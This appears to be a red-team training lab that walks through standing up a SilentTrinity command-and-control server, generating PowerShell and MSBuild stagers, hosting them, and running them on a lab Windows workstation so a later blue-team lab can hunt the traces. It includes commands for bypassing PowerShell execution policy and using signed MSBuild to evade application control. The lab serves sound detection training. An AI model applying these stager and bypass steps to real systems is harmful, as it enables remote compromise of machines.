L1130-Red - SilentTrinity Stagers Attack

Lab Contents

Lab Overview

In this lab, the student will stand up a C2 framework, create a listener for two malware implants, generate stagers, and detonate the payloads. The malware will leave a trail of IoCs that are discover-able in Elastic.

Lab Overview

Lab Overview

Initiate a Command and Control framework. Create malware and launch the Command and Control malware session on the Windows 10 workstation. Hunt for Indicators of Compromise.

Attack Step One

Linux - SSH Session 1 (Team Server)

To begin this lab, you will first connect to the Member Server (WS01). Then, you will connect to the Linux server at
For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.
Upon the first connection to an SSH server, you may get a popup warning to accept the remote server's SSL certificate. Accept the certificate and you will be prompted for credentials as a new window opens. The new window (it will have a black background) is the Putty SSH session. When you close the Putty window, the SSH session is disconnected. During this lab it will be necessary to have multiple SSH sessions Open.

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.


Launch Windows PowerShell from the Windows Start Menu.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input


PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Putty Session

With the PowerShell window open, run the following command which will launch Putty and initiate a connection to the server at The command instructs putty to open an SSH session on and specify the "itadmin" username.

putty -ssh [email protected]

As previously discussed, you may receive an alert regarding the SSH server SSL certificate. You will then be prompted for credentials. The password for the "[email protected]" account is:


Create Silent Trinity TeamServer

Working now within the Putty session: Use the following commands to access the SILENTTRINITY directory as root and access the virtual environment:

Bash Input

cd /opt/SilentTrinity

Launch the Silent Trinity Team Server

Bash Input

screen -S ST-teamserver
sudo python3.8 st teamserver --port 81 APTClass!

Bash Output

Attack Step Two

Linux - SSH Session 2 (Attacker Session)

For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.

Connect to SilentTrinity with Attack Client

SSH to using the PuTTY client installed on the WS01 system. Open a PowerShell and then execute putty using the command line.

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.


Launch Windows PowerShell from the Windows Start Menu.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input


PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Connecting to the SSH Server

From the powershell window, again connect to the Linux server with putty.


putty -ssh [email protected]

Connecting and Configuring the Silent Trinity Attack Server

We will now use the Bash prompts on the SSH server to create a screen session, followed by connecting to the ST server.


A screen session will allow a persistent SSH session.

Bash Input

cd /opt/SilentTrinity

It is the same process to get to this point for both Console Session 1 and Console Session 2 (and the same outcome).

ST Client

Now, connect to the team-server as a client with the following command:

Bash Input

sudo python3.8 st client wss://itadmin:APTClass\[email protected]:81

You will now be connected to the Silent Trinity C2 server.

Configure Command and Control Server

Once the SilentTrinity client as connected, execute the following commands one at a time.

Silent Trinity Input

use https
set port 4444

There is a now a listener running on TCP port 4444 waiting for connections.

Create Stager Malware

The instructions in this package tell the client to reach out to the command server for the remaining instructions (bits / bytes / malware stage). But there is no stager instruction set yet.

Silent Trinity Input

use powershell
generate https
use msbuild
generate https

Both stagers now reside in the /opt/SilentTrinity/ directory.

Silent Trinity Output

The next step of this lab will open a third SSH session, create a new directory to host the malware stagers, move the stagers and host the malware stagers.

Attack Step Three

Linux - SSH Session 3 (Malware Host)

For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.

Connect to the SSH Server

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.


Launch Windows PowerShell from the Windows Start Menu.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input


PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Connecting to the SSH Server

From the powershell window, again connect to the Linux server with putty.


putty -ssh [email protected]

Move Malware Stagers

Now that the malware stagers have been generated, lets move them into a new folder.

Bash Input

sudo -s
mkdir /opt/web
mv /opt/SilentTrinity/stager.* /opt/web
cd /opt/web

Host Malware Stagers via HTTP

Next, host the malware with python3’s http.server module.

Bash Input

python3 -m http.server

Bash Output

Now that the malware is being hosted on the Linux server, the next steps of the lab will download and execute the malware on the workstation. The malware is now being hosted at

Attack Step Four

Malware Stager Procurement

Now that the SilentTrinity framework is running, we have an attacker client connected, malware generated and served, its time to download the malware and attempt to execute it on the Member Server, WS01.

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.

Download Stagers

Open Internet Explorer.

Navigate using Internet Explorer’s address bar to and download both stagers.

Right (alternate) click both items and choose Save target as... Both items should be saved under the user’s Downloads folder.

A warning may be presented that can be ignored.

After the malware stagers have been downloaded, continue onto the next step of the lab to execute the malware.

Attack Step Five

Malware Artifact Execution

Continuing with the Remote Desktop Session on Member Server WS01, we now will execute the downloaded malware.

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.


Launch Windows PowerShell from the Windows Start Menu. See Lab L0250 for instruction on launching PowerShell.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input


PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Execution of HTTPS Stager

In PowerShell, run the following command to execute the malware stager for Silent Trinity.


Set-ExecutionPolicy bypass -Force
Import-Module .\Downloads\stager.ps1


PS C:\Users\itadmin> Set-ExecutionPolicy bypass -Force
PS C:\Users\itadmin> Import-Module .\Downloads\stager.ps1
[*] Found info in embedded resources:
        - GUID: 00000000-0000-0000-0000-000000000000
        - PSK: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
        - URLS: ####BEGIN_URLS_SECTION####loremipsumloremipsumloremipsumloremipsumloremip
[+] URLS:
[*] Attempting HTTP POST to
[-] Attempt #1
[*] Attempting HTTP GET to
[-] Attempt #1
[*] Downloaded 569104 bytes
        [-] 'Boo.Lang.Compiler.dll' was required...
        [+] 'Boo.Lang.Compiler.dll' loaded...
        [-] 'Boo.Lang.dll' was required...
        [+] 'Boo.Lang.dll' loaded...

[*] Compiling Stage Code
        [-] 'Boo.Lang.Extensions.dll' was required...
        [+] 'Boo.Lang.Extensions.dll' loaded...
        [-] 'System.dll' was required...
        [+] 'System.dll' loaded...
        [-] 'System.Core.dll' was required...
        [+] 'System.Core.dll' loaded...
        [-] 'System.Web.Extensions.dll' was required...
        [+] 'System.Web.Extensions.dll' loaded...
        [-] 'Boo.Lang.Parser.dll' was required...
        [+] 'Boo.Lang.Parser.dll' loaded...
        [-] 'Microsoft.VisualBasic.Devices.dll' was required...
        [-] 'Microsoft.VisualBasic.dll' was required...
        [+] 'Microsoft.VisualBasic.dll' loaded...
[+] Compilation Successful!
[*] Executing
Jr8d3q6GpM CheckIn

After the malware stager has been executed, continue on to the next phase of the lab.

Execution of MSBuild Stager

Under the context of an environment where application control is in effect the MSBuild.exe binary can be useful. While this lab environment does not restrict application execution in this manner, this lab section will demonstrate malware stager executed using Microsoft-Signed MSBuild.

Next, in PowerShell, run the following command to execute the stager for Silent Trinity with the trusted MSBuild binary.


cd c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
.\MSBuild.exe c:\Users\itadmin\Downloads\stager.xml

     (Note if the above fails, try:)

.\MSBuild.exe c:\Users\itadmin.labs\Downloads\stager.xml


C:\Users\itadmin> cd c:\Windows\Microsoft.NET\Framework64\v4.0.30319\

c:\Windows\Microsoft.NET\Framework64\v4.0.30319>MSBuild.exe c:\Users\itadmin.labs\Downloads\stager.xml
Microsoft (R) Build Engine version 4.8.3752.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.

Build started 3/16/2020 6:58:05 PM.
[+] URLS:
[*] Attempting HTTP POST to
[-] Attempt #1
[*] Attempting HTTP GET to
[-] Attempt #1
[*] Downloaded 569104 bytes
        [-] 'Boo.Lang.Compiler.dll' was required...
        [+] 'Boo.Lang.Compiler.dll' loaded...
        [-] 'Boo.Lang.dll' was required...
        [+] 'Boo.Lang.dll' loaded...

[*] Compiling Stage Code
        [-] 'Boo.Lang.Extensions.dll' was required...
        [+] 'Boo.Lang.Extensions.dll' loaded...
        [-] 'Boo.Lang.Parser.dll' was required...
        [+] 'Boo.Lang.Parser.dll' loaded...
        [-] 'Microsoft.VisualBasic.Devices.dll' was required...
[+] Compilation Successful!
[*] Executing
z8DiGrOcG3 CheckIn

Having launched both the malware stagers from PowerShell and from MSBuild, the next lab steps will check to ensure that the Command-and-Control malware has checked into the team-server.

Attack Step Six

Command and Control Sessions

After having configured the team-server, configured, built, hosted, and executed the Command and Control malware, the workstation should now have created two command and control sessions to the team-server.

Return to the SSH session that was operating the team-server's client (SSH Session Two). Check the team server's client side for client sessions with the following commands:

Silent Trinity Input


Silent Trinity Output

[1] ST (stagers)(msbuild) ≫ sessions
[1] ST (sessions) ≫ list
│ Name                                 │ User                        │ Address      │ Last Checkin │
│ 521a336b-e199-4bff-a81a-2207f37d79b2 │ LABS\itadmin@WS10-01 │ │ 00h 00m 01s  │
│ 162f4b13-6181-4d7f-988f-4da6c43fc307 │ LABS\itadmin@WS10-01 │ │ 00h 00m 00s  │
[1] ST (sessions) ≫

With having built a C2 Framework and connected the Member Server into the framework, lets begin the hunt.

Continue on to L1130-Blue

Lab Complete

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